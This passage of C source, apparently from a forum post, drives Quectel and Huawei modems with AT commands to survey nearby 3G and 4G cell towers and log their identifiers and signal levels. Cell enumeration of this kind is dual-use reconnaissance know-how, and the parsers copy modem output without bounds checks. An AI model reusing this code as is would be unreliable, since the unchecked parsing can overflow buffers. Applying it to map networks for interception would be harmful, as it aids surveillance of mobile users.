           fprintf(fp," \"ECIO\":\"%d\"\n",umts_list[merge_cnt].ecio);
           fprintf(fp,"}");
           fflush(fp);

    }
}




printf("################## END ################## \n");



                    lcdClear(fd);

                                    lcd_seconds = time(NULL);
                                        lcd_cur_time = lcd_seconds;
                                        lcd_delta_time = lcd_cur_time-lcd_start_time;
                    lcdPosition(fd,0,0);
                    lcdPrintf(fd,"3G BTS=%d SCAN #%d",lcd_merge_3g,max_dir+1);
                    lcdPosition(fd,0,1);
                    lcdPrintf(fd,"4G BTS=%d",lcd_merge_4g);
                    lcdPosition(fd,5,0);
                    lcdCursorBlink(fd,0);


}



int scan_lte(void){
    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"at+qcops=4,1,1,5\r");
    quectel_println(tx_string, sizeof(tx_string));
    lcd_seconds = time(NULL);
                                    lcd_cur_time = lcd_seconds;
                                    lcd_delta_time = lcd_cur_time-lcd_start_time;
                        lcdPosition(fd,0,0);
                        lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count+1, umts_count+1,lcd_delta_time);
                        lcdPosition(fd,0,1);
                        lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
                        lcdPosition(fd,5,0);
                        lcdCursorBlink(fd,1);

    while (1)
    {


        if(quectel_readln(buffer)<1){
                            printf("timeout reset");
                            memset(buffer,0,sizeof(buffer));
                            return -1;
                            }

        if (strstr(buffer, "OK") ){
            break;
            }
        if (strstr(buffer, "ERROR") ){

            printf("at command error,retry \n");
            quectel_reset();

            lcdClear(fd);
                            lcd_seconds = time(NULL);
                                lcd_cur_time = lcd_seconds;
                                lcd_delta_time = lcd_cur_time-lcd_start_time;
                    lcdPosition(fd,0,0);
                    lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count+1, umts_count+1,lcd_delta_time);
                    lcdPosition(fd,0,1);
                    lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
                    lcdPosition(fd,5,0);
                    lcdCursorBlink(fd,1);

            sleep(10);
            memset(tx_string,0,sizeof(tx_string));
            sprintf(tx_string,"at+qcops=4,1,1,5\r");
            quectel_println(tx_string, sizeof(tx_string));
        }
        if (strstr(buffer,"\"4G\"")){

            lteparse(buffer);
        }
    memset(buffer,0,sizeof(buffer));
    }
    memset(buffer,0,sizeof(buffer));
    return 1;
}



int huawei_imei(void)
{
    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"AT^CURC=0 \r");
    huawei_println(tx_string, sizeof(tx_string));

    while (1)
        {
                    if(huawei_readln(buffer)<1){
                    printf("timeout reset");
                    memset(buffer,0,sizeof(buffer));
                    return -1;
                    }


        if (strstr(buffer, "OK") ){
        break;
        }
        memset(buffer,0,sizeof(buffer));
        }

    memset(buffer,0,sizeof(buffer));

    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"AT+CGSN \r");
        huawei_println(tx_string, sizeof(tx_string));

        while (1)
            {

            if(huawei_readln(buffer)<1){
                        printf("timeout reset");
                        memset(buffer,0,sizeof(buffer));
                        return -1;
                        }


            if (strstr(buffer, "OK") ){
                memset(buffer,0,sizeof(buffer));
                break;
            }

            printf("%s \n",buffer);

            memset(buffer,0,sizeof(buffer));


            }

        memset(buffer,0,sizeof(buffer));

            return 1;

}



int qualcom_imei(void)
{

    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"AT+CGSN \r");
    quectel_println(tx_string, sizeof(tx_string));
    while (1)
    {

         if(quectel_readln(buffer)<1){
                            printf("timeout reset");
                            memset(buffer,0,sizeof(buffer));
                            return -1;
                            }




    if (strstr(buffer, "OK") ){
    break;
    memset(buffer,0,sizeof(buffer));

    }

    printf("%s \n",buffer);

                memset(buffer,0,sizeof(buffer));


    }
    memset(buffer,0,sizeof(buffer));
return 1;


}





int scan_umts(void){
    memset(tx_string,0,sizeof(tx_string));

    sprintf(tx_string,"at+qcops=2,1,1,5\r");

    quectel_println(tx_string, sizeof(tx_string));


    lcdClear(fd);
                lcd_seconds = time(NULL);
                    lcd_cur_time = lcd_seconds;
                    lcd_delta_time = lcd_cur_time-lcd_start_time;
                lcdPosition(fd,0,0);
                lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count, umts_count+1, lcd_delta_time);
                lcdPosition(fd,0,1);
                lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
                lcdPosition(fd,10,0);
                lcdCursorBlink(fd,1);



    while (1)
    {

        if(quectel_readln(buffer)<1){
                    printf("timeout reset");
                    memset(buffer,0,sizeof(buffer));
                    return -1;
                    }



    if (strstr(buffer, "OK") ){
        printf("received OK \n");
    break;
    }
    if (strstr(buffer, "ERROR") ){

        printf("at command error,retry \n");
        quectel_reset();

        lcdClear(fd);
                lcd_seconds = time(NULL);
                    lcd_cur_time = lcd_seconds;
                    lcd_delta_time = lcd_cur_time-lcd_start_time;
                lcdPosition(fd,0,0);
                lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count, umts_count+1, lcd_delta_time);
                lcdPosition(fd,0,1);
                lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
                lcdPosition(fd,10,0);
                lcdCursorBlink(fd,1);

        memset(tx_string,0,sizeof(tx_string));
        sprintf(tx_string,"at+qcops=2,1,1,5\r");
        quectel_println(tx_string, sizeof(tx_string));
    }
        if (strstr(buffer,"\"3G\"")){

            umtsparse(buffer);
        }

    memset(buffer,0,sizeof(buffer));
    }
    memset(buffer,0,sizeof(buffer));
    return 1;

}





int huawei_scan_umts(void){

    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"AT^SYSCFGEX=\"02\",3FFFFFFF,1,2,7FFFFFFFFFFFFFFF,, \r");

    huawei_println(tx_string, sizeof(tx_string));
    memset(buffer,0,sizeof(buffer));

    while (1)
    {
    huawei_readln(buffer);

    if (strstr(buffer, "OK") ){
        printf("huawei switched to umts %s \n",buffer);
        memset(buffer,0,sizeof(buffer));
        break;
    }

    if (strstr(buffer, "ERROR") ){

            printf("at command error,retry \n");
            sprintf(tx_string,"AT^SYSCFGEX=\"02\",3FFFFFFF,1,2,7FFFFFFFFFFFFFFF,, \r");

                huawei_println(tx_string, sizeof(tx_string));
        }

    memset(buffer,0,sizeof(buffer));
    }

    memset(buffer,0,sizeof(buffer));

    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"AT^NETSCAN=20,-110,1\r");

        huawei_println(tx_string, sizeof(tx_string));

        while (1)
        {
            if(huawei_readln(buffer)<1){
            printf("timeout reset");
            memset(buffer,0,sizeof(buffer));
            return -1;
            }


        if (strstr(buffer, "OK") ){


            break;
            }

            if (strstr(buffer, "ERROR") ){
                printf("at command error,retry \n");
                memset(tx_string,0,sizeof(tx_string));
                sprintf(tx_string,"AT^NETSCAN=20,-110,1\r");
                        huawei_println(tx_string, sizeof(tx_string));
            }






            if (strstr(buffer, "^NETSCAN: ") ){
                huawei_umtsparse(buffer);
        }


            memset(buffer,0,sizeof(buffer));
        }


    memset(buffer,0,sizeof(buffer));
    return 1;
    }






int huawei_scan_lte(void){

    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"AT^SYSCFGEX=\"03\",3FFFFFFF,1,2,7FFFFFFFFFFFFFFF,, \r");

    huawei_println(tx_string, sizeof(tx_string));

    memset(buffer,0,sizeof(buffer));
    while (1)
    {
        if(huawei_readln(buffer)<1){
                    printf("timeout reset");
                    memset(buffer,0,sizeof(buffer));
                    return -1;
                    }


    if (strstr(buffer, "OK") ||strstr(buffer, "ECCLIST") ){
        printf("huawei switched to LTE %s \n",buffer);
        memset(buffer,0,sizeof(buffer));
        break;
    }


    if (strstr(buffer, "ERROR") ){

                printf("at command error,retry \n");
                memset(tx_string,0,sizeof(tx_string));
                sprintf(tx_string,"AT^SYSCFGEX=\"03\",3FFFFFFF,1,2,7FFFFFFFFFFFFFFF,, \r");

                    huawei_println(tx_string, sizeof(tx_string));
            }



    memset(buffer,0,sizeof(buffer));
    }

    memset(buffer,0,sizeof(buffer));

    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"AT^NETSCAN=20,-110,3\r");

        huawei_println(tx_string, sizeof(tx_string));

        while (1)
        {
            if(huawei_readln(buffer)<1){
                        printf("timeout reset");
                        memset(buffer,0,sizeof(buffer));
                        return -1;
                        }

        if (strstr(buffer, "OK") ){
            break;
            }

        if (strstr(buffer, "ERROR") ){

                    printf("at command error,retry \n");
                    memset(tx_string,0,sizeof(tx_string));
                    sprintf(tx_string,"AT^NETSCAN=20,-110,3\r");

                        huawei_println(tx_string, sizeof(tx_string));
                }



            if (strstr(buffer, "^NETSCAN: ") ){
                huawei_lteparse(buffer);
        }
            memset(buffer,0,sizeof(buffer));
        }


    memset(buffer,0,sizeof(buffer));
    return 1;
    }











void huawei_scan(){

    /////////////////////3G UMTS SCAN////////////////////
        printf("new HUAWEI UMTS scan started \n");


        lcdClear(fd);
        lcd_seconds = time(NULL);
            lcd_cur_time = lcd_seconds;
            lcd_delta_time = lcd_cur_time-lcd_start_time;
        lcdPosition(fd,0,0);
        lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count+1, umts_count+1,lcd_delta_time);
        lcdPosition(fd,0,1);
        lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
        lcdPosition(fd,10,1);
        lcdCursorBlink(fd,1);



        while(1){
        if ( huawei_scan_umts()<1)
            {
            huawei_reset();
            }
        else
        {
            break;
        }
        }




        while (umts_count_huawei!=umts_count_huawei_old) //rescan while modem founds new cells in each round
        {
            printf("HUAWEI UMTS rescan started. UMTS cell count = %d \n",umts_count_huawei+1);
            lcdClear(fd);
            lcd_seconds = time(NULL);
                lcd_cur_time = lcd_seconds;
                lcd_delta_time = lcd_cur_time-lcd_start_time;
            lcdPosition(fd,0,0);
            lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count+1, umts_count+1, lcd_delta_time);
            lcdPosition(fd,0,1);
            lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei+1);
            lcdPosition(fd,10,1);
            lcdCursorBlink(fd,1);

            umts_count_huawei_old = umts_count_huawei;
            while(1){
                    if ( huawei_scan_umts()<1)
                        {
                        huawei_reset();
                        }
                    else
                    {
                        break;
                    }
                    }
        }
        printf("HUAWEI UMTS scan completed. Total 3G cell count = %d \n",umts_count_huawei+1);
        lcdClear(fd);
        lcd_seconds = time(NULL);
            lcd_cur_time = lcd_seconds;
            lcd_delta_time = lcd_cur_time-lcd_start_time;
        lcdPosition(fd,0,0);
        lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count+1, umts_count+1,lcd_delta_time);
        lcdPosition(fd,0,1);
        lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei+1);
        lcdPosition(fd,5,1);
        lcdCursorBlink(fd,1);



        /////////////////////LTE SCAN////////////////////
            printf("new HUAWEI LTE scan started \n");
            while(1){
                            if ( huawei_scan_lte()<1)
                                {
                                huawei_reset();
                                }
                            else
                            {
                                break;
                            }
                            }
            while (lte_count_huawei!=lte_count_huawei_old) //rescan while modem founds new cells in each round
            {
                printf("HUAWEI LTE rescan started. LTE cell count = %d \n",lte_count_huawei+1);
                lcdClear(fd);
                lcd_seconds = time(NULL);
                    lcd_cur_time = lcd_seconds;
                    lcd_delta_time = lcd_cur_time-lcd_start_time;
                lcdPosition(fd,0,0);
                lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count+1, umts_count+1,lcd_delta_time);
                lcdPosition(fd,0,1);
                lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei+1, umts_count_huawei+1);
                lcdPosition(fd,5,1);
                lcdCursorBlink(fd,1);

                lte_count_huawei_old = lte_count_huawei;
                while(1){
                                if ( huawei_scan_lte()<1)
                                    {
                                    huawei_reset();
                                    }
                                else
                                {
                                    break;
                                }
                                }
            }
            printf("HUAWEI LTE scan completed. Total 4G cell count = %d \n",lte_count_huawei+1);






}


void qualcom_scan(){

    /////////////////////3G UMTS SCAN////////////////////
    printf("new UMTS scan started \n");


    lcdClear(fd);
    lcd_seconds = time(NULL);
        lcd_cur_time = lcd_seconds;
        lcd_delta_time = lcd_cur_time-lcd_start_time;
    lcdPosition(fd,0,0);
    lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count, umts_count,lcd_delta_time);
    lcdPosition(fd,0,1);
    lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
    lcdPosition(fd,10,0);
    lcdCursorBlink(fd,1);


    while(1){
        if ( scan_umts()<1)
            {
            sleep(1);
            quectel_reset();
            }
        else
        {
            break;
        }
        }


    while (umts_count!=umts_count_old) //rescan while modem founds new cells in each round
    {
        printf("UMTS rescan started. UMTS cell count = %d \n",umts_count+1);
        lcdClear(fd);
        lcd_seconds = time(NULL);
            lcd_cur_time = lcd_seconds;
            lcd_delta_time = lcd_cur_time-lcd_start_time;
        lcdPosition(fd,0,0);
        lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count, umts_count+1, lcd_delta_time);
        lcdPosition(fd,0,1);
        lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
        lcdPosition(fd,10,0);
        lcdCursorBlink(fd,1);



        umts_count_old = umts_count;
        while(1){
                if ( scan_umts()<1)
                    {
                    sleep(1);
                    quectel_reset();
                    }
                else
                {
                    break;
                }
                }

    }
    printf("UMTS scan completed. Total 3G cell count = %d \n",umts_count+1);
    lcdClear(fd);
    lcd_seconds = time(NULL);
        lcd_cur_time = lcd_seconds;
        lcd_delta_time = lcd_cur_time-lcd_start_time;
    lcdPosition(fd,0,0);
    lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count, umts_count+1,lcd_delta_time);
    lcdPosition(fd,0,1);
    lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
    lcdPosition(fd,5,0);
    lcdCursorBlink(fd,1);



    /////////////////////SCAN 4G LTE//////////////////////
    printf("New LTE scan started \n");


    while(1){
            if ( scan_lte()<1)
                {
                sleep(1);
                quectel_reset();
                }
            else
            {
                break;
            }
            }



    while (lte_count!=lte_count_old) //rescan while modem founds new cells in each round
    {
        printf("LTE rescan started. LTE cell count = %d \n",lte_count+1);

        lcd_seconds = time(NULL);
        lcd_cur_time = lcd_seconds;
        lcd_delta_time = lcd_cur_time-lcd_start_time;

        lcdClear(fd);
                        lcd_seconds = time(NULL);
                            lcd_cur_time = lcd_seconds;
                            lcd_delta_time = lcd_cur_time-lcd_start_time;
        lcdPosition(fd,0,0);
        lcdPrintf(fd,"#1 4G=%d 3G=%d %d",lte_count+1, umts_count+1,lcd_delta_time);
        lcdPosition(fd,0,1);
        lcdPrintf(fd,"#2 4G=%d 3G=%d",lte_count_huawei, umts_count_huawei);
        lcdPosition(fd,5,0);
        lcdCursorBlink(fd,1);

        lte_count_old = lte_count;
        while(1){
                    if ( scan_lte()<1)
                        {

                        sleep(1);
                        quectel_reset();
                        }
                    else
                    {
                        break;
                    }
                    }
    }


    printf("LTE scan completed. Total 4G cell count = %d \n",lte_count+1);


}


int main(void){



    int code = wiringPiSetup();
    if (code !=0){
        printf("wiring init error");
    }

pinMode (19,OUTPUT);
digitalWrite(19,1);
sleep(5);



pinMode (19,OUTPUT);
digitalWrite(19,0);


    /* pinMode (BUTTON4, INPUT) ;
    while (1){

        sleep(1);
        printf("button = %d \n",digitalRead (BUTTON4));
    }
*/


fd = lcdInit(2,20,4,LCD_RS,LCD_E,LCD_D4,LCD_D5,LCD_D6,LCD_D7,0,0,0,0);
lcdCursorBlink(fd,0);
lcdClear(fd);
lcdPosition(fd,0,0);
lcdPuts(fd,"BASEBAND STARTING");
lcdPosition(fd,0,1);
lcdPuts(fd,"SCAN  VIEW  GPS  ...");

    printf("start quectel modem init \n");

sleep(20);

    lcd_seconds = time(NULL);
    lcd_start_time = lcd_seconds;


    ////////////////////////////////////////////////


struct stat st = {0};


DIR *d;
      struct dirent *dir;
      d = opendir(LOG_DIR);
      if (d) {
        while ((dir = readdir(d)) != NULL ) {
          if ((dir->d_type==4)&&!(strstr(dir->d_name, ".") ))
          {
            if (atoi(dir->d_name) > max_dir )max_dir =atoi(dir->d_name);
              printf("%s   %d\n", dir->d_name, dir->d_type);
          }
          }
        closedir(d);
      }

      printf("max dir = %d \n",max_dir);

      sprintf(dir_name,"%s%d",LOG_DIR,max_dir+1);

      if (stat(dir_name, &st) == -1) {
          mkdir(dir_name, 0777);
      }

sprintf(file_name,"%s/lte_cells.json",dir_name);

fp = fopen(file_name ,"a");
fprintf(fp,"{\n");
fprintf(fp,"\"cell\": [\n");
fflush(fp);








if (quectel_start()){

qualcom_imei(); // extract and print qualcomm ec-25 modem imei
qualcom_scan(); //complete and iterative network scan using qualcomm modem
}


if (huawei_start())
{
printf("huawei started ok - next \n");
huawei_reset();
huawei_imei();
huawei_scan();


}



merge_arrays();

fprintf(fp,"]\n");
fprintf(fp,"}\n");
fflush(fp);

fclose(fp);
}

header.h

C:Copy to clipboard

#ifndef HEADER_H_
#define HEADER_H_

#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <dirent.h>
#include <time.h>
#include <math.h>
#include <inttypes.h>
#include <string.h>
#include <termios.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/i2c-dev.h>
#include <sys/ioctl.h>
#include "/usr/local/include/wiringPi.h"
#include "/usr/local/include/lcd.h"
#include "serial.h"




#define LOG_DIR "/home/linaro/bts_logs/"


#define LCD_RS 25
#define LCD_E 24
#define LCD_D4 23
#define LCD_D5 22
#define LCD_D6 21
#define LCD_D7 20


#define BUTTON1 2
#define BUTTON2 6
#define BUTTON3 9
#define BUTTON4 10

int quectel_start(void);

void lteparse(char *);
void umtsparse(char *);
void huawei_umtsparse(char *umtsstring);
void huawei_lteparse(char *ltestring);

int scan_lte(void);
int scan_umts(void);


void huawei_reset(void);
int huawei_scan_umts(void);
int huawei_scan_lte(void);
int huawei_start(void);
void huawei_scan(void);


void qualcom_scan(void);
int qualcom_imei(void);

void merge_arrays(void);


#define MAX_CELL 40


struct UMTS_CellData{

    int plmn;
    int arfcn;
    char lac[50];
    char cid[50];
    int psc;
    int rscp;
    int ecio;

};
typedef struct UMTS_CellData UMTS_Cell;


struct LTE_CellData{

    int plmn;
    int arfcn;
    char channel[50];
    int pci;
    char tac[50];
    int rssi;
};
typedef struct LTE_CellData LTE_Cell;






#endif /* HEADER_H_ */

serial.c

C:Copy to clipboard

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <termios.h>
#include <inttypes.h>
#include <string.h>
#include "serial.h"
#include <time.h>

int uart0_filestream = -1;

int uart1_filestream = -1;



long start_time =0;
long cur_time =0;
long delta_time=0;
time_t seconds;

int quectel_init(void)
{
    uart0_filestream = open(PORTNAME_QUECTEL, O_RDWR | O_NOCTTY | O_NDELAY);

    if (uart0_filestream == -1)
    {

        return 0;
        //TODO error handling...
    }
    return 1;
}


int huawei_init(void)
{
    uart1_filestream = open(PORTNAME_HUAWEI, O_RDWR | O_NOCTTY | O_NDELAY);

    if (uart1_filestream == -1)
    {

        return 0;
        //TODO error handling...
    }
    return 1;
}




void quectel_config(void)
{
    struct termios options;
    tcgetattr(uart0_filestream, &options);
    options.c_cflag = B115200 | CS8 | CLOCAL | CREAD;
    options.c_iflag = IGNPAR;
    options.c_oflag = 0;
    options.c_lflag = 0;
    tcflush(uart0_filestream, TCIFLUSH);
    tcsetattr(uart0_filestream, TCSANOW, &options);
}



void huawei_config(void)
{
    struct termios options;
    tcgetattr(uart1_filestream, &options);
    options.c_cflag = B115200 | CS8 | CLOCAL | CREAD;
    options.c_iflag = IGNPAR;
    options.c_oflag = 0;
    options.c_lflag = 0;
    tcflush(uart1_filestream, TCIFLUSH);
    tcsetattr(uart1_filestream, TCSANOW, &options);
}




void quectel_println(const char *line, int len)
{
    if (uart0_filestream != -1) {
        char *cpstr = (char *)malloc((len+1) * sizeof(char));
        strcpy(cpstr, line);
        cpstr[len-1] = '\r';
        cpstr[len] = '\n';

        int count = write(uart0_filestream, cpstr, len+1);
        if (count < 0) {
            //TODO: handle errors...
        }
        free(cpstr);
    }
}

void huawei_println(const char *line, int len)
{
    if (uart1_filestream != -1) {
        char *cpstr = (char *)malloc((len+1) * sizeof(char));
        strcpy(cpstr, line);
        cpstr[len-1] = '\r';
        cpstr[len] = '\n';

        int count = write(uart1_filestream, cpstr, len+1);
        if (count < 0) {
            //TODO: handle errors...
        }
        free(cpstr);
    }
}




int quectel_readln(char *buffer)
{
    char c;
    char *b = buffer;
    int rx_length = -1;

    seconds = time(NULL);
       start_time = seconds;


    while(1) {
        rx_length = read(uart0_filestream, (void*)(&c), 1);

        seconds = time(NULL);
        cur_time = seconds;
        delta_time = cur_time-start_time;


        if (delta_time>260){
 return -1;
         }

        if (rx_length <= 0) {
            //wait for messages
            sleep(1);
        } else {
            if (c == '\n') {
                *b++ = c;
                return 1;
            }
            *b++ = c;
        }
    }
}






int huawei_readln(char *buffer)
{
    char c;
    char *b = buffer;
    int rx_length = -1;


    seconds = time(NULL);
    start_time = seconds;

    while(1) {
        rx_length = read(uart1_filestream, (void*)(&c), 1);


                            seconds = time(NULL);
                               cur_time = seconds;
                               delta_time = cur_time-start_time;



        if (delta_time>60){


return -1;
        }

        if (rx_length <= 0) {
            //wait for messages


            sleep(1);
        } else {
            if (c == '\n') {
                *b++ = c;
                return 1;
            }
            *b++ = c;
        }
    }




}




void quectel_close(void)
{
    close(uart0_filestream);
}

serial.h

C:Copy to clipboard

#ifndef SERIAL_H_
#define SERIAL_H_

#include <inttypes.h>

#ifndef PORTNAME_QUECTEL
//#define PORTNAME_QUECTEL "/dev/ttyUSB2"
#define PORTNAME_QUECTEL "/dev/ttyUSB7"
#endif


#ifndef PORTNAME_HUAWEI
//#define PORTNAME_HUAWEI "/dev/ttyUSB6"

#define PORTNAME_HUAWEI "/dev/ttyUSB0"
#endif



int quectel_init(void);
void quectel_println(const char *, int);
int quectel_readln(char *);
void quectel_close(void);





void quectel_config(void);
void huawei_config(void);



int huawei_init(void);
void huawei_println(const char *, int);
int huawei_readln(char *);





#endif /* SERIAL_H_ */

modem.c

C:Copy to clipboard

#include "header.h"


LTE_Cell lte_list[MAX_CELL]={};
UMTS_Cell umts_list[MAX_CELL]={};



LTE_Cell lte_list_huawei[MAX_CELL]={};
UMTS_Cell umts_list_huawei[MAX_CELL]={};

char umts_count = 0;//num of founded cells in this scan round
char lte_count = 0; //num of founded cells in this scan round


char umts_count_huawei = 0;//num of founded cells in this scan round
char lte_count_huawei = 0; //num of founded cells in this scan round


int quectel_start(void){
       if (quectel_init()){
        quectel_config();
        //Write commands
               printf("quectel init ok \n\r");
       return 1;
       }

       printf("quectel init error\n");

       return 0;
}




int huawei_start(void){
       if (huawei_init()){
        huawei_config();
        //Write commands
               printf("HUAWEI init ok \n\r");
       return 1;
       }

       printf("HUAWEI init error\n");

       return 0;
}




void huawei_lteparse(char *ltestring)
{
char *p = ltestring;
int plmn =0;
int arfcn =0;
int pci=0;
char tac[50]={};
int rssi=0;

//printf("input string = %s", p);

p = strchr(p, ' ')+1; //skip header

arfcn = atoi(p);

p = strchr(p, ',')+1;
p = strchr(p, ',')+1;
p = strchr(p, ',')+1;


    char tmpstring[1024];
    strcpy(tmpstring,p);
    char *ch;
    ch= strtok(tmpstring,",");
    strcpy(tac,ch);


    p = strchr(p, ',')+1; //skip mcc

    plmn = atoi(p)*100;
    p = strchr(p, ',')+1; //skip mnc
    plmn += atoi(p);


    p = strchr(p, ',')+1; //skip zero
     p = strchr(p, ',')+1; //rssi
     rssi = atoi(p);


     p = strchr(p, ',')+1;
     p = strchr(p, ',')+1;
     p = strchr(p, ',')+1;
     p = strchr(p, ',')+1;



pci=atoi(p);

     if (arfcn>0){

         char n1=0;

         while (n1<MAX_CELL) //find last empty array element
         {
             if (lte_list_huawei[n1].arfcn==0 || lte_list_huawei[n1].arfcn==arfcn) break;
             n1++;
         }


         if (lte_list_huawei[n1].arfcn!=arfcn){ //add cell only if this cell really new
         lte_list_huawei[n1].plmn = plmn;
         lte_list_huawei[n1].arfcn = arfcn;
         lte_list_huawei[n1].pci=pci;

         memcpy(lte_list_huawei[n1].tac,tac,sizeof(tac));
         lte_list_huawei[n1].rssi = rssi;

         lte_count_huawei=n1;



       printf ("plmn = %d  arfcn = %d channel = %s tac=%s pci= %d rssi=%d  \n",lte_list_huawei[n1].plmn, lte_list_huawei[n1].arfcn, lte_list_huawei[n1].channel,lte_list_huawei[n1].tac,lte_list_huawei[n1].pci,lte_list_huawei[n1].rssi);
         }

     }


//printf("arfcn %d tac %s plmn %d rssi %d cid %s \n ",arfcn,tac,plmn, rssi,channel);


}




void huawei_umtsparse(char *umtsstring)

{

    char *p = umtsstring;
    int plmn =0;
    int arfcn =0;
    char lac[50]={};
    char cid[50]={};
    int rssi=0;
    int psc =0;

    //printf("input string = %s", p);


    p = strchr(p, ' ')+1; //skip header

    arfcn = atoi(p);


    p = strchr(p, ',')+1; //skip header
    p = strchr(p, ',')+1; //skip header
    p = strchr(p, ',')+1; //skip header


    char tmpstring[1024];
    strcpy(tmpstring,p);
    char *ch;
    ch= strtok(tmpstring,",");
    strcpy(lac,ch);


    p = strchr(p, ',')+1; //skip mcc
    plmn = atoi(p)*100;
    p = strchr(p, ',')+1; //skip mnc
    plmn += atoi(p);


    p = strchr(p, ',')+1; //skip zero
    p = strchr(p, ',')+1; //rssi
    rssi = atoi(p);




    p = strchr(p, ',')+1; //cid
    memset(tmpstring,0,sizeof(tmpstring));
    strcpy(tmpstring,p);
    ch = strtok(tmpstring,",");
    strcpy(cid,ch);

    p = strchr(p, ',')+1; //dummy
    p = strchr(p, ',')+1; //psc
    psc = atoi(p);





    if (arfcn>0){ //if channel info decoded norm
        char n1=0;

        while (n1<MAX_CELL) //find last empty array element
        {
            if (umts_list_huawei[n1].arfcn==0 || umts_list_huawei[n1].arfcn == arfcn) break;
            n1++;
        }

        if (umts_list_huawei[n1].arfcn != arfcn){
        umts_list_huawei[n1].plmn = plmn;
        umts_list_huawei[n1].arfcn = arfcn;
        memcpy(umts_list_huawei[n1].lac,lac,sizeof(lac));
        memcpy(umts_list_huawei[n1].cid,cid,sizeof(cid));
        umts_list_huawei[n1].psc = psc;

        umts_list_huawei[n1].rscp = rssi;

        umts_count_huawei=n1;

       printf ("plmn = %d  arfcn = %d lac=%s cid=%s psc=%d rscp =%d \n",umts_list_huawei[n1].plmn, umts_list_huawei[n1].arfcn,umts_list_huawei[n1].lac,umts_list_huawei[n1].cid,umts_list_huawei[n1].psc,umts_list_huawei[n1].rscp);
        }
        }

}



void umtsparse(char *umtsstring)
{
char *p = umtsstring;
int plmn =0;
int arfcn =0;
char lac[50]={};
char cid[50]={};
int psc=0;
int rscp =0;
int ecio =0;
    p = strchr(p, ',')+1; //skip 3g


    p = strchr(p, ',')+1; //skip operator name

    p = strchr(p, '\"')+1; //skip operator name
    plmn = atoi(p);

    p = strchr(p, ',')+1; //skip operator name
    p = strchr(p, ',')+1; //skip operator name


    arfcn = atoi(p);

    p = strchr(p, ',')+1; //skip arfcn

    char tmpstring[1024];

    strcpy(tmpstring,p);

    char *ch;
    ch= strtok(tmpstring,",");
    strcpy(lac,ch);

    p = strchr(p, ',')+1; //skip arfcn


    memset(tmpstring,0,sizeof(tmpstring));
    strcpy(tmpstring,p);
    ch = strtok(tmpstring,",");
    strcpy(cid,ch);

    p = strchr(p, ',')+1; //skip arfcn
    psc = atoi(p);

    p = strchr(p, ',')+1; //skip arfcn
rscp = atoi(p);


p = strchr(p, ',')+1; //skip arfcn
ecio = atoi(p);



if (arfcn>0){ //if channel info decoded norm
    char n1=0;

    while (n1<MAX_CELL) //find last empty array element
    {
        if (umts_list[n1].arfcn==0 || umts_list[n1].arfcn == arfcn) break;
        n1++;
    }

    if (umts_list[n1].arfcn != arfcn){
    umts_list[n1].plmn = plmn;
    umts_list[n1].arfcn = arfcn;
    memcpy(umts_list[n1].lac,lac,sizeof(lac));
    memcpy(umts_list[n1].cid,cid,sizeof(cid));
    umts_list[n1].psc = psc;
    umts_list[n1].rscp = rscp;
    umts_list[n1].ecio = ecio;

    umts_count=n1;

   printf ("plmn = %d  arfcn = %d lac=%s cid=%s psc=%d rscp= %d ecio=%d \n",umts_list[n1].plmn, umts_list[n1].arfcn,umts_list[n1].lac,umts_list[n1].cid,umts_list[n1].psc,umts_list[n1].rscp,umts_list[n1].ecio);
    }
    }


}




void lteparse(char *ltestring)
{
    char *p = ltestring;
int plmn =0;
int arfcn =0;
char channel[50]={};
char tac[50]={};
int rssi=0;


    p = strchr(p, ',')+1; //skip 4g


    p = strchr(p, ',')+1; //skip operator name

    p = strchr(p, '\"')+1; //skip operator name
    plmn = atoi(p);


    p = strchr(p, ',')+1; //skip operator name
    p = strchr(p, ',')+1; //skip operator name


    arfcn = atoi(p);

    p = strchr(p, ',')+1; //skip arfcn

    char tmpstring[1024];

    strcpy(tmpstring,p);

    char *ch;
    ch= strtok(tmpstring,",");
    strcpy(channel,ch);
    p = strchr(p, ',')+1; //skip arfcn


    memset(tmpstring,0,sizeof(tmpstring));
    strcpy(tmpstring,p);
    ch = strtok(tmpstring,",");
    strcpy(tac,ch);

    p = strchr(p, ',')+1; //skip arfcn

    rssi = atoi(p);


if (arfcn>0){

    char n1=0;

    while (n1<MAX_CELL) //find last empty array element
    {
        if (lte_list[n1].arfcn==0 || lte_list[n1].arfcn==arfcn) break;
        n1++;
    }


